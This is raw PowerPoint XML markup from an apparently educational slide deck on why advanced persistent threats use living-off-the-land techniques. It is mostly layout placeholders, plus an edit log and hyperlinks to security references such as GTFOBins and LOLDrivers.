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777"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370502-7817-4D35-82D6-26817FA73EDC}" v="6" dt="2024-09-24T18:54:43.2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128" d="100"/>
          <a:sy n="128" d="100"/>
        </p:scale>
        <p:origin x="5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lison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Allison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}" dt="2024-09-24T18:54:43.247" v="6"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Allison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}" dt="2024-09-24T18:52:37.293" v="4" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="396364806" sldId="256"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Allison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}" dt="2024-09-24T18:52:04.235" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2949129743" sldId="258"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Allison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}" dt="2024-09-24T18:52:13.619" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2082816904" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Allison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}" dt="2024-09-24T18:52:32.066" v="3"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="734496748" sldId="260"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Allison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}" dt="2024-09-24T18:54:36.841" v="5"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="904814748" sldId="261"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Allison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}" dt="2024-09-24T18:54:43.247" v="6"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1577587552" sldId="262"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Allison Reeves (GCE)" userId="17f2d13c-fdb5-4d97-9bdf-710c7fc77bf0" providerId="ADAL" clId="{68370502-7817-4D35-82D6-26817FA73EDC}" dt="2024-09-24T18:52:23.572" v="2"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1618941842" sldId="77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4B7D-BB82-3615-BBA9-66959A65A9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DB21E3-494B-D3D2-F124-218DA4210F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72150F-E9F2-738E-6C4C-7E85148DE97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{928C6A66-6DA4-B06D-3EF9-8CAD953089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2E36EC-B94B-7F78-2C40-F88D9E5BE780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2689297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AAC84-6A14-861F-8E68-6A4D7C4F4A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4DA6BE-DEFD-DE71-09A2-0E5118D6ED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6665DC-9226-C1E0-E623-F3677E28B46E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD4074B-9C1C-63FB-40C6-288288FDC9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8F0C81-F758-DBE3-221B-CB396324AF1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2722317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511A96-E754-9D92-BD5B-B9AE22EECC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C65AED-1DF7-0A43-B5FC-385F5FD60B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EEF553-4F15-D49D-7775-237BFE51F2B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB37896-C2E5-788D-A2F1-0A671F058E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28E2C0-F13D-2D5E-C005-3CD12098EA13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1323956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0FF73-1226-1FDA-D0AA-0807A9078B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95ECE2-81E8-5A77-20DB-FB49FA132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FD5E88-9AE6-6B54-6CD3-1D5846D65009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75142EC-F93B-9C37-F442-3BEFA478AF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591459-B52E-2582-C901-2912AC85F964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2061965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10380-E7C5-796E-71BE-ED9F34ABD8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15DC5C-38A6-792D-1D17-94A208D9A9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1CD7C9-A2C0-BF88-2428-B4D0A88D578E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8DF834E-F81B-F2CF-99BE-1156158F47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E1DE5B-B777-D08E-E5C8-93B0884B5075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129372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16DF5-2380-8253-AE22-56614FDF38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AEA81C-EF82-0CF0-CFBB-8B5DFA2B90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615951-3483-E078-BFB8-CA594F1290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1234CC-07E7-ED05-2CBA-E89F69295780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE0F0573-286E-EBDD-B7AB-216E5B42D4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810861-306C-292F-8482-D993EC512D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2537280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839F9-68CF-317A-DE2C-93C2ECFBB7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C2745B-E796-93EC-382A-F0C6197298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C00670-CA9B-78BD-94A4-CF94A104C0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88B96B-21B3-408F-39E4-9BF9C7B539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97558C-4A94-E6F9-C64D-D51F4656FF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B9F8B4-EEDB-424B-5F4C-13A2CE806EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9776A54C-3D88-0EFD-AB42-40F66F059F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E2979A-8764-14B2-3337-5D31E2EF6FA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2704202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B93D9-7D59-F458-D449-1529E67362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A818B5-583D-D9CA-2A12-063C90DA685B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E468826-04DB-9ABA-A2A8-F8DCC2B19D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5F53B7-0E28-F110-F5EC-A31895B74C77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="931665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1700E4-F7D7-8459-3A9B-268756F1ED43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18CF60C-B3E7-0592-6E6C-74C360E23C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E8E8D9-019D-C4EA-8879-9308523D7A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3991015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22FC9-D915-73FA-7DCB-BC8E36BEAD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2B3456-D57C-2636-C368-6FDC5698F7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00E484-A105-7EB5-F085-2BB03443EB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D504A2-1004-CCA3-68E6-D46F64B0AD0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E372430B-D339-6C7D-E48E-4D3393F2D1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22B768-F47A-670F-2B95-AE2FC717FCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2814511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3FBE8-8A0F-237C-824B-B5D2374D9E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EEAD49-9D06-8166-34C5-F9FADD215F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3DE31E-ED77-6388-ACE2-52A453F8B1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32B739-2B34-89F5-BC22-B43268DB211E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{67779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B6B6CA5-51F9-694B-4C55-624B3FDEF0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695AC3-1514-C64D-FC0B-394E89108FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{69617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1454837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50FB05-43AE-D4FD-693A-CA3C16EB8F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BA8FFF-32F5-1A39-00DD-6E205DB4D8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D40EAD-8020-B4BE-346F-7B7CE97F4E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779CFA-644F-43E7-9A99-3A668BC9D725}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/11/25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{336DFC34-706C-1BEA-31E4-65EC3C1F4E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70C9A2-F3F5-65C9-7060-347BE8CD2D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617EEC-FC7F-4161-AE7E-947BBC2B8178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2288217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recordedfuture.com/blog/diamond-model-intrusion-analysis"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i40v-MLpazI&amp;t=621s" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.loldrivers.io/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=fPdbQPhIghk" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/livingofftheland" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=j-r6UonEkUw"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2B783EE-0239-4717-BBEA-8C9EAC61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29E03E-533A-DE96-8028-203BB8B7A55D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="345810"/>
            <a:ext cx="5120561" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Why do Advanced Persistent Threats Utilize Living Off the Land Techniques?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162A2FE1-56FC-7B82-7ED4-9128A0AA5878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
